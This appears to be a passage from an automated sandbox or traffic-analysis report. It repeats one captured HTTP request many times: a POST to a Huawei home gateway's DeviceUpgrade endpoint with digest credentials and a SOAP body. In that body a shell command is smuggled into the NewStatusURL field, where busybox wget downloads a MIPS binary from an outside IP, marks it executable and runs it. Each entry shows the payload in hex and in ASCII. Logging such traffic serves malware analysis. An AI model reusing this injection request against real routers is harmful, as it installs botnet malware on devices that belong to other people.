6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
